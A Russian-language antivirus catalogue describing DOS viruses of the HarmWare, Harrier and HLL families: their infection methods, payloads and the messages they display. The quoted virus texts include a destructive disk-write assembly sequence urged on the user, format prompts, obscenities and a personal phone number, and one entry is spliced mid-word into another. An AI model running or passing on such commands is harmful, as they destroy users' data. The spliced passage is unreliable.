Опасный резидентный, частично зашифрованный, вирус. Портит при заражении EXE-файлы, имеющие внутренние оверлеи. Содержит тексты "Eat me Lozinsky!", "Harmless v1.0, 10/06/92 Tyumen".

HarmWare.3516, 3716

Опасные резидентные полиморфные вирусы. При заражении файлов вирусы не изменяют их длину.При внедрении в файл вирусы производят анализ данного файла с целью выяснения возможности его упаковки достаточно простым алгоритмом сжатия, используемым данными вирусами. После чего вирусы сжимают программный код и записывают свой код в начало файла. В EXE- файлы вирусы могут внедрить код, который производит настройку адресов перемещаемых элементов, при этом количество этих элементов в заголовке EXE-файла обнуляется. Вирусы содержат анти-отладочные приемы. При неаккуратной трассировке могут уничтожить содержимое секторов жесткого диска. Периодически, если не было нажатий на клавиши, вирусы производят "вращение экрана".При открытии таблиц ревизора ADinf, вирусы возвращают ошибку открытия файла-таблицы. А также пытаются обмануть ADinf всевозможными манипуляциями: сохранением в видеопамяти текущей страницы экрана и последующим ее восстановлением, подсовыванием в буфер клавиатуры скан-кода клавиши Enter и др. Но это происходит только в том случае, если на экране в этот момент присутствуют строки "ADinf", allocation error!
Bad command or file name
Cannot load COMMAND.COM . . .
Internal stack overflow!
Incorrect DOS version
This program requires Microsoft Windows.
и блокирует запуск данных программ. Иногда (если командная строка начинается с параметра @@) может вывести сообщение:
© 1996y by TechnoRat "HDL" GenNo: 000122.
где параметр "GenNo" является счетчиком заражений. До меня дошел 122 инфицированный файл. Содержит тексты:
?VirMON-I-Virus has been installed successfully!
?VirMON-W-execution 0 error!
©reated by HARD WISDOM!!! (hacker)

Harrier.14058

Опасный резидентный полиморфный вирус. Вирус состоит из сплошных команд переходов, которые идут после 1-10 "рабочих вирусных" инструкций. Т.о., последовательно выполняющиеся вирусные инструкции разбросаны по всему телу вируса и передают друг другу управление с помощью инструкций безусловных переходов. Таким стилем программирования автор, видимо, хотел показать "глубину" своего таланта.Вирус записывает в MBR жесткого диска код. При старте программы DRWEB вирус разрушает ее,записывая в нее процедуру вывода сообщения "Lame program MUST DIE!!!".Блокирует вывод на принтер, печатая текст "VIRLIST.WEB is Sucks!!!". Также, в некоторых других ситуациях вирус выводит на экран тексты:
This program requires Melcosoft Windows.
?VirMON-I-Virus has been installed successfully!
Division by zero!
IBMBIO<> Message added specially for PolyGris.
Program too big to fit in memory
Cannot load COMMAND.COM . . .
ALLE:WP © 1996,1997y by TechnoRat "NextHDL" GenNo: 000008. Release 0
Peripherals not responded!
Memory allocation error!
RAM parity error!
CPU mode thunking error!
Incorrect DOS version
Internal stack overflow!
Error in EXE file
Packed file is corrupt
Power integrity error!
Mad command or file name
I/O gate damaged!
Warning, FPU overcooled!
Low CPU voltage!
A20 moving failure!
DMA channels crosslinked!
?VirMON-W-execution 0 error!
Bad command or file name
Cooler device emergency!
This program requires Microsoft Windows.

HDDError

Опасный загрузочный вирус. При заражении MBR жестких дисков и загрузочных секторов флоппи-дисков не сохраняет оригинальные сектора. "Отрезает" 1 Kb от памяти DOS, но размещает свою резидентную копию во второй половине таблицы векторов прерываний и "перехватывает" INT 40h. Выводит следующие сообщения "FATAL ERROR:", "CPU FAILED.","HDD ERROR.".

HeadMonth.473

Опасный нерезидентный вирус. В 1994 году пытается форматировать первую дорожку жесткого диска на головке, соответствующей значению текущего месяца.

Helicopter.777

Резидентный вирус. Внедряется в середину COM-файлов (определяет формат файла по двум буквам расширения - "OM"). Ищет во всем файле последовательность 777 байт со значением 0, и если такая последовательность будет найдена, то вирус записывает себя в данную область. При установке графического режима изображения 320x200 (f.0005 INT 10h) на экране появляется пролетающий вертолет. Содержит зашифрованный текст "I~m Mashka !! By Crazy !".

HelloUser.402

Неопасный шифрованный вирус. Производит поиск и заражение *.CoM-файлов на диске C:. Содержит текст "*.CoM << Ebbelwoi >> by (Ы)SнRнUS 10-93 D-63225".

HellSpawn.1141

Неопасный резидентный стелс-вирус-спутник. Перехватывает INT 09, 10h, 13h, 1Ch, 21h. При установке 13h графического видеорежима (640x320) рисует в левом верхнем углу экрана что-то похожее на пламя. При нажатии на Ctrl-Alt-Del в центре экрана также выводит нечто похожее на огонь. Содержит текст "HellSpawn v0.91a © 1993 by Stormbringer".

HH&H.4087, 4091, 4093, 4115

Неопасные резидентные шифрованные вирусы. При заражении COM-файла переименовывают их в файл в *.A*, инфицируют его и переименовывают обратно. По понедельникам записывают значение 0 в порт A0h и B0h в порт 41h. При обнаружении на экране строки "ESIK" выводят на экране в графическом видеорежиме скачущий шарик, который заполняет весь экран точками. Содержат один из следующих текстов:
#(-28=CIPV]HARD HIT & HEAVY HATE the HUMANS !! [ H.H.& H.H. the H. ]
#(-28=CIPV]В семье все взвесив заново решили окончательно:КОМПАРТИЮ ЗЮГАНОВА ПОДДЕРЖИМ ОБЯЗАТЕЛЬНО

Hi.460, 802, 892, 895, 924

Неопасные (Hi.802 - опасный) резидентные вирусы. Содержат строку "Hi" или "IH". Hi.802 имеет строку "AOB 3".Hi.895 после 1 октября производит некие музыкальные звуки. Hi.924 периодически "переворачивает" экран. Hi.892 после 23 октября при быстрых перемещениях мыши выводит на экран "NU MAI MUSKA MOUSE-il CA A LOVESTI PESTE COAIE". Hi.802 по воскресеньям блокирует работу с принтером, 10 мая - с последовательными портами, 25 ноября удаляет все запускаемые файлы, по седьмым числам месяца часто перезагружает систему.

Hider.1782

Опасный нерезидентный вирус. Удаляет файлы данных некоторых антивирусов *.MS и *VIR.DAT. 13 числа выводит сообщение:
Anston Rant is back for more! Whoa, looks like you be missin some files there, Bud!
После чего устанавливает всем файлам в корневом директории диска C: атрибут "скрытый" (hidden).

HideNowt.1741 (1,2)

Применяют антитрассировочные приемы. Содержат строку "Yx", которую используют, как идентификатор заражения файлов.

Hinder.380

Резидентный вирус. Имеет текст "Hinder II Ver 2.00 © 1995".

Hiroshima.826

Очень опасный нерезидентный вирус. Заражает файл C:\COMMAND.COM. Периодически уничтожает содержимое "винчестера".

HLL-вирусы.

Вирусы, написанные на языках высокого уровня (High Level Language). Подразделяются на 3 вида:
HLLC - вирусы-спутники (Companion).
HLLO - вирусы, записывающиеся поверх кода программ (Overwrite).
HLLP - вирусы, сохраняющие работоспособность инфицированных программ (Parasitic).

HLLC.5000

Упакован LZEXE. Производит поиск *.exe файлов в текущем каталоге и создает для них вирусы-спутники с такими же именами, но с расширением COM. Создает 3 вируса-спутника за один сеанс работы.

HLLC.AIDS.8064

Неопасный нерезидентный вирус-спутник. Создает для EXE-файлов вирусный файл-компаньон с расширением COM. По окончании работы, если EXE файл- "хозяин" не найден.

HLLC.April1st

Нерезидентный вирус-спутник, написанный на Turbo C, в формате EXE-файла и упакованный "компрессором" PKLITE 1.03. Производит поиск и заражение *.exe файлов на текущем диске. При нахождении *.exe файла вирус создает файл e.lex, записывая в него свой вирусный код, переименовывает EXE-файл в файл с таким же именем, но с расширением OVL и переименовывает файл e.lex в файл с именем и расширением оригинального EXE-файла. При запуске такого EXE-файла, содержащего вирус, вирус производит попытки найти и заразить следующий EXE-файл, после чего запускает на выполнение OVL-файл, содержащий код инфицированной программы. Если такой OVL-файл не будет найден, то вирус выводит сообщение "Abnormal program termination".

HLLC.Bolek

При поиске и заражении EXE-файлов перехватывает INT 01 и INT 03. Может перезагрузить систему. Присваивает EXE-файлам расширение OVB и создает вирусный файл с именем оригинального EXE-файла. Содержит текст "Bolek! Bolek! Bolek!".

HLLC.Chainik

Опасный нерезидентный вирус. Производит поиск *.EXE-файлов на диске C: и заражает их, если в каталоге заражаемого EXE-файла имеются еще хотя бы 2 файла с такими же именами (например, NC.EXE, NC.MNU, NC.INI,...). Вирус присваивает EXE-файлу случайное расширение, записывает свой код в файл с именем заражаемого EXE-файла и сохраняет в своем теле название переименованного инфицированного EXE-файла. С 1 января 1997 года по воскресеньям вирус "вешает" систему, выведя на экран текст:
Сегодня воскресенье!
Я отдыхаю!
С 13 февраля по 13 числам месяца вирус проигрывает гимн Казахстана и последовательно выводит на экран следующие строки:
И все равно ты ЧАЙНИК, раз до сих пор меня не обезвредил!
Чего смотришь, выключай скорей компьютер!
Я же вирус, дурень!
Выключай, а то я файлы стирать буду!
Что, не веришь?
Я серьезно!
Сейчас чего-нибудь сотру...
Вот я стер ABCDEFGH.EXE
Почему я еще включен?
Ну ты тормоз, Вася!
Хочешь, чтобы я еще чего-нибудь стер?
Вот, пожалуйста, стер IJKLMNOP.EXE
Мужик, не доводи меня!
Выключай меня скорей!
Ну, как хочешь, сейчас я сотру 100 файлов...
... и удаляет файлы на диске C:.

HLLC.Chs.6208

Опасный нерезидентный вирус-спутник. Упакован утилитой DIET. Найденным COM и EXE-файлам вирус присваивает имя, отличающееся только последней буквой. К последней букве вирус прибавляет значение ASCII 2, например, если файл назывался FILE.EXE, то вирус переименовывает его в FILG.EXE и создает вирус-спутник с именем оригинального файла - FILE.EXE. Вирус разрушает некоторые файлы, выводит сообщение:
Oh, excuse me, but something destroyed...
You can prevent your data lossing if you will go to bad,
because night is a time for sleeping (not for working !!!)

HLLC.CP

Неопасный вирус-спутник. Написан в формате EXE-файла и упакован PKLITE. При старте вирус производит поиск и заражение файлов C:\DOS\MEM.EXE и C:\DOS\SMARTDRV.EXE. Затем вирус производит поиск и заражение *.EXE- файлов в текущем каталоге. Заражение происходит следующим образом: вирус с помощью командного процессора производит переименование файла- жертвы в файл с расширением DAT, например, файл MEM.EXE будет переименован в MEM.DAT, затем, опять же, с помощью командного процессора вирус производит копирование файла, из которого вирус стартовал, в файл - жертву, например следующим образом: COMMAND.COM /C COPY CP.EXE MEM.EXE >NUL.

HLLC.Delme

Неопасный вирус-спутник. Переименовывает заражаемые файлы, присваивая им имена с расширением, две последние буквы которых XL и создает файл с кодом вируса, но с именем оригинального файла. Для файла WIN.COM создает файл TTENG.DLL. Для проверки разрешения записи на диск создает и удаляет файл DELME.ZZZ.

HLLC.Dope.4870, 5219

Неопасные вирусы-спутники. Написаны на Turbo C++ в формате COM-файла и упакованы PKLITE 1.15. HLLC.Dope.5219 содержит текст "DOPE By KiLLeRbytE".

HLLC.Dosinfo

Опасный вирус-спутник. Производит поиск *.BAT файлов. Если в каталоге, содержащем найденный BAT-файл вирусом не будет найден файл DOSINFO.EXE, то вирус создает данный файл и записывает в него вирусный код. После этого вирус создает файл OVERWR, в который записывает строки:
@echo off
dosinfo.exe после которых вирус записывает содержимое найденного BAT-файла. Оригинальный BAT-файл удаляется, а файлу OVERWR присваивается имя этого BAT-файла. 25 декабря, 7 октября, 1 мая, 17 июня, 3 октября, 9 ноября, 13 августа вирус удаляет файл C:\AUTOEXEC.BAT, после чего выводит в графическом режиме карикатуру на Эрика Хонекера (бывшего генерального секретаря компартии ГДР), ниже которой расположен текст:
Hiermit wurde Ihre Autoexec auf Anweisung des Ministerrates der Deutschen Demokratischen Republik gelФscht. Erichs letzte Rache! P.S. Ich komme wieder!
И проигрывает национальный гимн ex-ГДР.

HLLC.Halley

Содержит тексты:
HALLEY -virus v.1.0
-------------------
# Don`t panic, I`m the harmless one.
I just want to travel...
Have a nice day!
Shit happens... at .
I WANT TO TRAVEL!! I WANT TO TRAVELL!!

HLLC.Hambre

Опасный нерезидентный вирус, написанный на языке Borland C++ в формате EXE-файла. Удаляет в текущем каталоге файлы *.D??. Содержит текст "HAMBRE.C HAMBRE".

HLLC.Lab5

Опасный нерезидентный вирус. Последовательно создает на дисках A: и B: файлы config.exe, MsDos.exe, Io.exe, содержащие вирусный код. Т.е., если на диске уже присутствует файл config.exe, то вирус создает файл MsDos.exe. Вирус ищет на случайном логическом диске *.exe-файл, переименовывает его в файл, содержащий вместо первой буквы имени букву "Q", и создает с помощью командного процессора вирусный файл с оригинальным именем. После этого вирус создает новый файл C:\AUTOEXEC.BAT, в который записывает вызов созданной инфицированной программы. Содержит тексты "DON'T CATCH ME , REMEMBER", "Пожалуйста не стирайте файл lab_5.res..Это очень важные данные для меня.Спасиибо Вам"

HLLC.Mimicry

Содержит тексты "Mimicry virus v. 2.1 . Proudly in Nadym.","Your fuckin computer so fuckin bad ... I want cuureee him ... ha-Ha-HA".

HLLC.Murmansk

Неопасный нерезидентный вирус-спутник. Может завесить систему и вывести текст: Dear user! I worked whole day. And now I want to rest!ате EXE-файла и упакован утилитой TinyProg 3.3. При первом запуске вирус копирует с помощью командного процессора себя на диск C:, переименовывает файл C:\CONFIG.SYS в C:\@VIRUS2@.!!!. Создает новый файл C:\CONFIG.SYS, в который записывает строку INSTALL=RUNME.EXE /VIRUS_SESSION. Также вирус уничтожает командный процессор.

HLLC.Sputnic

Неопасный нерезидентный вирус-спутник. Создает файлы N.BAT и R.BAT, с помощью которых, посредством запуска командного процессора, производит присваивание *.EXE-файлу-жертве расширения *.STL, копирование вирусной программы под именем оригинального файла и запуск инфицированного файла -носителя. Вирус содержит в своем теле отладочную информацию из которой видно, что вирус был создан из исходного файла SPUTNIC.C.

HLLC.Uri

Неопасный нерезидентный вирус. Создает вирусные файлы-спутники с расширением URI для поражаемых EXE-файлов. Вирус содержит тексты:
Virus URI now activated !!!
Я - вирус Uri-безвредный, однако срочно пройдите курс Уринотерапии!
Пора помочиться на клавиатуру и в дисководы.
А вот Билли не повезло! Его окошечки не получат логотип
"Virus Uri compatible".
Vinnitsa Virus Soft © 1998 (VVS)

HLLC.Vs&W.3966

Неопасный нерезидентный вирус-спутник. Создает вирусный файл-спутник с расширением COM для EXE-файлов. При заражении файла включает режимы клавиатуры: NumLock, CapsLock, ScrollLock. Выводит текст "Я безвредное существо.". Также содержит тексты:
DPS.Companion Virus! © Copyright 1996 by Max Max
Вирус написан для Санкт-Петербургского ДПШ ( абсолютно безвредная )
Привет Миксеру, Мишке, Кириюхе, Виктору Ивановичу, и всем другим
Советую выполнить: Mov ax,310h / Xor cx,cx / Mov dx,80h / Int 13h

HLLC.Unvisible (1,2)

Неопасные вирусы.EXE-файлам присваивают расширение OVL и создают вирус- спутник с настоящим именем файла-жертвы. Создают файл VIRUS.DOC. По окончании работы вирусов данный файл удаляется. 13 числа после 13 заражений файлов создают в корневом каталоге файл _.COM и записывают в файл C:\AUTOEXEC.BAT вызов данного _.COM файла. _.COM производит переворачивание изображения на экране.

HLLO.AIDS.13952

Опасный нерезидентный вирус. Содержит тексты:
This File Has Been Infected By AIDS! HaHa!

HLLO.Hacks

Опасный вирус. Производит поиск *.EXE-файлов, удаляет их и вместо них создает файлы с теми же именами, но содержащими только вирусный код. По окончании своей работы вирус выводит текст "Looking for hacks" и пытается найти в доступных через переменную PATH каталогах файл AIDS1284.EXE. Если это ему удается, то вирус удаляет данный файл и выводит сообщение:
На твоем компе обнаружена опаснейшая программа, которой ты еще и пользуешься!!!! Это так называемый Aidstest 1284, который вовсе не Aidstest, а оригинальный hackersoft! Потому мы во избежание неприятностей аккуратно его затерли! Урря!
После чего выводит одно из следующих сообщений:
Program too big to fit in memory
Illegal copy
Error allocating int21h
Your mouse looks very sexually.
I cannot work with her.
Вставьте в дисковод наждачную бумагу и наберите FORMAT A: /S/U
Если у вас простаивает комп, наберите HA AR012 HA C:\*.*
Мы все живем для того, чтобы завтра сдохнуть.
Is any hacker a fucker?
Остановите винчестер!!!! Ну вот, уже поздно...
Insert key disk into drive A: and press TURBO

HLLO.Joker.10000, 11000

Опасные нерезидентные вирусы. Заражают EXE-файлы на дисках C: и A:. Разрушают *.DBF-файлы. По окончании своей работы выводят один из перечисленных ниже текстов:
Error in EXE file
File cannot be copied onto itself
Compare OK
Invalid Volume ID Format failure
Incorrect DOS version
Please put a new disk into drive A:
End of input file
END OF WORKTIME. TURN SYSTEM OFF!
Divide Overflow
Water detect in Co-processor
I am hungry! Insert HAMBURGER into drive A:
NO SMOKING, PLEASE! Thanks.
Don't beat me !!
Don't drink and drive.
Another cup of cofee ? OH, YES!
Can you fuck me ? Maybe ...
Coca-Cola is it !
What about ? Oh, yes. O.K. TODAY
Missing VGA! Call (209) 683-6858 !
Attention! Hard Disk is RADIOACTIVE!
I'm so much dirty! CLEAN ME!
Kiss my ... keyboard!
Hard Disk's head has been destroyed. Can you borow me your one?
Missing light magenta ribbon in printer!
In case mistake, call GHOST BUSTERS
Insert tractor toilet paper into printer.
Are you funny?
Keep smiling!
Warning! In drive A: are two diskettes.
Warning! Your mouse has some virus!
Disconnect your mouse, there are some cats!
I don't understand you. Can you repeat it?
West Lake Software and Data Research, WA 0108077, New Orleans, © 1986

HLLO.Karma

Опасный нерезидентный вирус. В конце свой работы выводит на экран текст:
You have bad karma!
Hare Krishna! Hare Rama!
Также содержит строки:
BAD KARMA
© Lamer of Virus
Vinnitsa

HLLO.M&M

Опасный вирус. Ищет *.EXE-файлы, создает их заново и записывает 8803 байт своего кода в них. Содержит текст "M&M". Иногда оставляет в памяти резидентную программу, производящую "осыпание" букв на экране.

HLLO.ShadowGard

Опасный вирус. Производит поиск *.COM и *.EXE-файлов и записывает свой код в начало файла, не сохраняя программный код. При удачном заражении выводит одно из сообщений: "Illegal copy", "Insufficient memory", "Network busy", "Drive not ready". Внутри вируса имеется текст:
[Shadow-Gard] in
This is only DEMO version ! Prepare...

HLLO.Termit

Опасный вирус. После заражения файла вирус выводит на экран текст.

HLLO.Tyst

Очень опасный вирус. Производит поиск *.* файлов в каталогах, обозначенных в переменной PATH. При нахождении файла-жертвы (например, файл FILE.EXE) вирус запускает командный процессор с параметрами ( допустим, запущенный инфицированный файл имеет имя C:\TYSTVIR.EXE): /C copy C:\TYST.EXE FILE.EXE> NUL. Т. о., вирус копирует свой код в файл-жертву, причем новые инфицированные файлы будут создаваться в текущем каталоге. При старте вирус выводит сообщение:
Tyst fФr fan.. Jag sprДnger!!

HLLO.Vm

Очень опасный вирус. Содержит тексты:
OBBS Net is the best fido-technology net in the world
For more information please call NS - SOFTWARE BBS
You cant use ESC key.This key allowed only for OBBS members Your sincirely VM
OBBS Net is the best fido-technology net in the world
For more information please call NS - SOFTWARE BBS
Sorry but floppy disk operations today supported only for OBBS users Your sincirely VM
OBBS Net is the best fido-technology net in the world
For more information please call NS - SOFTWARE BBS
Что-то с памятью твоей стало :-) гы-гы
Your sincirely VM

HLLO.Vs&W.3017

Очень опасный вирус. Содержит текст:
ю Вирус под именем DPS ( от русского ДПШ ), создан в Санкт-Петербурге
ю Привет всем хакерам Санкт-Петербурга, а также Миксеру, Мишке, и
ю Виктору Ивановичу от Vs&W Hackers Group, by Mad Max Hacker
ю НУ ОЧЕНЬ ПЛОХОЙ ВИРУС ю
ю AлисA; Roxette; АрИЯ; Iron Maiden
ю © Copyrigth 1996, by Mad Max ( Vs&W ).
Все права защищены
( разумеется тут нет никаких прав, просто так, ради прикола
Привет Дмитрию Лозинскому и Игорю Данилову

HLLO.Vs&W.3836

Очень опасный нерезидентный вирус. Выводит сообщение:
Virus by Vs&W Hackers Group. Я не заражаю больше 5 файлов
С Новым Годом!
The World will hear from me again
А меня звать MadMax, привет Викторы Ивановичу из ДПШ
Прошу прощенья за то, что ЭТО попало к вам
Отошлите ЭТО Игорю Данилову или Дмитрию Лозинскому
Они разбируться сто к сему. В этом я уверен
Также содержит текст:
Вас приветствует Vs&W Hackers Group
Ради интереса мы написали этот вирус
Прошу дать ему название "VS&W", пожалуйста!!!
Ждите новых поступлений от хакеров Санкт-Петербурга
Вирус написано на Турбо Паскале 7.00, и упакован DIET`ом
Привет MiXER`у от MadMax`а
MiXER ты еще на Бэйсике страдаешь или нет?

HLLP.4641

Очень опасный вирус. Написан на Turbo Pascal и упакован PKLITE. Разрушает файлы с расширениями PAS,BAS,TXT,BAK,PCX,MID,PIC,CUT,C,ARC, PAK,ZIP,LZH,ICE,CHZ,ARJ.

HLLP.4665

Во время заражения файлов создает временные файлы MAIN.EXE и TEMP.EXE.

HLLP.7808 (1,2)

Неопасные нерезидентные вирусы. Написаны в формате EXE-файла. Появилась модификация вируса HLLP.7808(1),упакованная утилитой LZEXE версии 0.91.

HLLP.8905

Очень опасный нерезидентный вирус. В среду пытается уничтожить содержимое диска C:.

HLLP.BeginPas

Неопасный нерезидентный вирус. Написан на языке Pascal. Производит поиск *.PAS-файлов в текущем каталоге,открывает их, ищет строку "BEGIN" и сразу же после этой строки вставляет ссылку на процедуру "virus". Записывает данную вирусную процедуру на языке Pascal в исходные PAS- тексты. В результате после компиляции такого PAS-файла получится инфицированный исполняемый модуль, способный дальше инфицировать исходные тексты, написанные на языке Pascal в файлах *.PAS. При нахождении *.PAS-файла вирус выводит на экран его имя, после заражения файла выводит текст "Infected!".

HLLP.BelGUT

Неопасный нерезидентный вирус. Выводит на экран текст:
IT'S A LITTLE FUCK FROM BelGUT!

HLLP.Birthday.5824

Неопасный нерезидентный вирус. Написан на языке высокого уровня, видимо, Borland Turbo Pascal, в формате EXE-файла. Первые 5824 байт файла-жертвы вирус переносит в конец файла, а вместо этих байт записывает свой код с собственным заголовком EXE-файла и Relocation Table. 6,7 и 8 сентября выводит соответствующие строки: "Tomorrow will be my birthday !", "Today is my birthday !", "Yesterday was my birthday !". После чего "вешает" систему.

HLLP.Bishkek.3990, 4170, 4240

Опасные нерезидентные вирусы. Упакованы PKLITE (HLLP.Bishkek.3990 упакован LZEXE). HLLP.Bishkek.4170 разрушает *.BAS-файлы, записывая в них строку "(Smokie4 virus © by N5 school BISHKEK 1". Эту же строку вирус иногда выводит на экран.HLLP.Bishkek.4240 периодически записывает в загрузочные сектора дисков A:, B:, C: количество головок -1 (смещение +1Ah), после чего выводит текст "Smokie3 virus,я затер Ваш сектор Вы, поняли ? Y/N". Также содержит текст "Smokie3 © by N5 school Bishk". HLLP.Bishkek.3990 иногда выводит текст "Smokie4 virus (v) by N5 school BISHKEK" и содержит в своем теле тексты "GoodTie error", "PordTons VirBoy", "VirBoy in Bishkek".

HLLP.Ceib.4629, 5000

Неопасные нерезидентные вирусы. Написаны на Turbo Pascal в формате EXE- файлов и упакованы утилитой LZEXE.HLLP.Ceib.4629 создает и удаляет файл C.EIB, HLLP.Ceib.5000 - файл со случайным именем и с расширением TMP, видимо, для проверки разрешения записи на диск. HLLP.Ceib.4629 также создает файл SV11, а HLLP.Ceib.5000 - тот же случайный файл, в которые записывают 4629 или 5000 байт вирусного кода, а затем записывают содержимое найденного COM или EXE-файла-жертвы. После чего удаляют исходный файл, а файлу SV11 или случайному файлу присваивают имя файла- жертвы. Не заражают следующие файлы: NC.EXE, NCMAIN.EXE, IBMBIO.COM, IBMDOS.COM,COMMAND.COM.HLLP.Ceib.5000 устанавливает случайные системные дату и время. HLLP.Ceib.5000.

HLLP.Chs.6549

Опасный нерезидентный вирус. Упакован DIET. В субботу и воскресенье может натворить всевозможных "пакостей": замедлить клавиатуру, уничтожить содержимое CMOS, вывести сообщение,...
I know, you don't like me and my deeds...

HLLP.ChSU

Неопасный нерезидентный вирус. Упакован LZEXE. Удаляет файлы *.MS?. Содержит тексты "Quick Fuck virus from ChSU version 1.0", "Cheboksary - 95".

HLLP.Daemon

Неопасный нерезидентный вирус. Может вывести одно из нижеследующих текстов в рамке, которая стоит в списке первой:
ЙНННННН Exception error 666 at ННННННН»
ИННННННННННН Press RESET to continue НННННННННННј
Daemon's Gate virus v1.666
Attention! Your Hard Disk is RADIOACTIVE!
(Missing light magenta ribbon in printer!
In case mistake, call GHOST BUSTERS
Insert tractor toilet paper into printer.
Warning! Your mouse has some virus!
Disconnect your mouse, there are some cats!
Water detected in Co-processor
I am hungry! Insert HAMBURGER into drive A:
NO SMOKING, PLEASE! Thanks.
End of worktime. Turn off the computer.
Processor Pentium Pro 200MHz not found.
18Gb free disk space not found.
512Mb extended memory not found.
16Mb TRIDENT VGA video card not found.
Invalid user.
Send this to Danilov. He know what to what.
Insert new user into drive C:
Processor not found.
What is it ? I know. This is fuck.
Error. Can't fuck keyboard.
L O S E R ! ! !
Fuck you later !
User is LOH
Залипание клавиатуры !
Вентилятор защищен от записи !
CPU мертв, а FPU не заводится.
В дисководе A: две дискеты !
COMMAND.COM умер !
Плохой мотор detected !
Пробоина в диске C:
It's time to save your non-saved work,
because you have only ?? seconds left ?
Say bye-bye to your non-saved data

HLLP.Dekas

Опасный нерезидентный вирус. Удаляет *.DOC и *.TXT файлы, записывая в них перед удалением слово "Dekas".

HLLP.Destroy

Очень опасный нерезидентный вирус. Упакован LZEXE. В файлы: DIRINFO, *.PAS, *.BAS, *.ASM, *.BAT. *.ME, *.DIZ записывает различные тексты, содержащие нецезурные выражения.

HLLP.Doggy.6202, 6606, 6667, 6685, 6686, 8421, 9535

Неопасные нерезидентные вирусы. Упакованы WWPACK. HLLP.Doggy.9535 состоит из вируса HLLP.Doggy.6202 и некой "заглушки" длиной 3333 байт. При старте "заглушка" создает файл SWAP.$$$ куда записывает 3333 байта своего кода, затем она удаляет свой код (3333 байт) из стартовавшего файла и запускает этот файл, который содержит код вируса HLLP.Doggy.6202. Этот вирус производит поиск *.EXE-файлов и инфицирует их своим кодом (6202 байта). После чего вирус HLLP.Doggy.6202 читает 3333 первых байта из уже только что инфицированного EXE-файла и записывает их в конец этого файла. После чего HLLP.Doggy.6202 пытается прочитать 3333 байта "заглушки" из файла SWAP.$$$ и записать их в начало инфицируемого файла. Если же произойдет ошибка чтения из файла SWAP.$$$, то далее инфицированный файл сможет заражать файлы кодом вируса HLLP.Doggy.6202, но по окончании работы, как правило, такие файлы будут "вешать" систему. 28 числа многие вирусы выводят тексты:
HLLP.Doggy.6606:
P.S. Dr. Danilovv! You Web doesnt detect Pascal!
HLLP.Doggy.6686:
HAPPY BIRTHDAY! GOOD DOGGY! WE WISH ALL THE BEST! Our 3d version of GDB (GOOD GODDY`s BIRTHDAY) !!!!
HLLP.Doggy.8421:
SHUTKA GLUPISHI !
Today is ГУУД ДОГГИ's БИРЗДЭЙ !!!
superskie igrushki: Zuganov - borodavka
super digger acade voleybol
Wi mojete ih kupit besplatno na beloye pivo bbs
zvoniti nam vsegda!!! ass-hole
etu programu napIsal KHARITONOV SASHKA
+7 (095) 135-62-53 (sasha)
ТОЛЬКО для вирмэйкеров -> у меня АОН
Ja nichego voobshe ne bous! Mne 7 let, ja talant!!
gorod moskva, storona zugoslavia ...
ЪДДД ХАРЯ ДДДДДДДДї
іДанилофф привet! і
іЯ просто прикалываюсь с моей igrushkou! і
АДДДДДДДДДДДДДДДДДЩ
нам конешно нравится веб, но он тормозит!
ЛОХинскай! неужели ты досихпор не мозешь мойпать иванхальф?
Как насчет exterface для лозатеста?
а том этот НЕГР С БЕЛЫМИ БУКАМИ!
привет КСПЕРМА IVGENYJ!
izvini chto tak nazivau, просто у тебя prikolнаяя фамилия!
mOGU POJERTVOVAT NA PIVO BBS 100 $$$$ B/W DOLLAROV
PRESS ENTER>
=-=-=-=-=-=-=-=-=
КТО не зоаполнит анкету, тот ПИДОР ГОРБАТЫЙ!
ЛОЗ, войди на свою BBS под именем MUDILA VATNY
и напиши пароль = GGGGGGG
ТАМ ДЛЯ ТЕБЯ маленький сюрпризе!!!
А ТЕПЕРЬ АНКЕТА :
1. Имя, фамилия, отчество ЕЛЬЦИНА БОРИСА НИКОЛАЕВИЧА
2. как назвается самый ***вый антивирус:
a) AIDSTEST
б) PIDRTEST
v) LOZATEST
3. Кто кого породил?
а) КСПЕРМА всех
б) лоз Дамнилофф
4. ОТКУДА ВЗЯЛСЯ ДАМНИЛОФФ?
А) ЛОЗ НАШОЛ ЕГО В КАПУСТЕ
б) ЕГО ПРИНЕС АИСТ
В) ЛОЗ ЕГО КУПИЛ В МАГАЗИНЕ
PRESS ENTER===>
BEST GAMES: WARCRAFT 2
BEST DEMO: MS-SUXX
ИНТЕРЕСНО, ВСТАВЯТ ЛИ ЭТИ ЧУВАКИ ЭТОТ ВИРУС В СВОИ ВИРЛИСТЫ
ЗДЕСЬ ЧАСТИЧНО(а может и очень сильно) ЗАДЕТО ИХ САМОЛЮБИЕ....ПОСМОТРИМ
WITH KINDEST REGARDS, YOURS KHARITONOV SASHKA
PRESS ENTER to format your disk
Звездочками (*) в данном сообщении заменены фамилия и координаты девушки, которой был посвящен данный вирус. Элла попросила меня убрать эти строки из данного описания. Видимо, ей не очень понравилась любовь господина Харитонова Александра.
HLLP.Doggy.6685 3 числа выводит следующий текст:
MegaDeth 94 Youthanasia
MegaDeth 95 Hidden Treasures
MegaDeth 96 Peace Sells... But who's buying
HLLP.Doggy.6202, 9535 5 числа выводит текст:
Имеют также тексты:
HLLP.Doggy.6606:
GOOD DOGGY`S BIRTHDAY VIRUS V3.0
St. Peterburg © 1996 May
Written in PSCVG V2.1 by Robocop
-------------------------------------------------
Especially for GOOD Doggy from Robocop!
Onyx is dead, I can`t beleive it. Fucking Skins!
Bad command or file name
DOG!
HLLP.Doggy.6667:
Элла
HLLP.Doggy.6685
© 1996 X-PROXET Labs, St. Peterburg
MegaDeth V1.0
-=-=-=-=-=-=-=-
MegaDeth Live
MD96
HLLP.Doggy.6686:
© 1996 GDB V3.0 X-PROXET Labs, St. Peterburg
Written by Dwarven-Mike and Robocop
Happy birthday, Good Doggy!
Dear Doggy, we wish you to spend this holiday very nice!
We wish your parents to present you nice modem & upgrade!
We wish you eat a lot, drink smth and fuck smb as a real
enjoyment!
Yours, X-PROXET
Dwarven-Mike, Robocop, Kharitonov Alexander, SMACKMAN,
Scat-J, NightRider, PollutionPreventer, Swat, Skinhead,
Stryker, Verenia and newcomers.
Enjoy!
X-PROXET Best Pascal Program Club © 1992-96 SMACKMAN
Bad command or file name
DOG3
HLLP.Doggy.8421:
GOOD DOGGY`S BIRTHDAY VIRUS V2.0
-----------------------------------
Pascal Source Code Virus Generator © 1995
© 1996 February by X-PROXET labs
St. Petersburg
PROGRAMMING GROUP:
Funny text by Kharitonov Alexander
Generator written by Dwarven-Mike © 1995 December
Work & modification by SMACKMAN (president of X-PROXET)
Distributors: Scat-J, Robocop, PollutionPreventer
------------------------------------
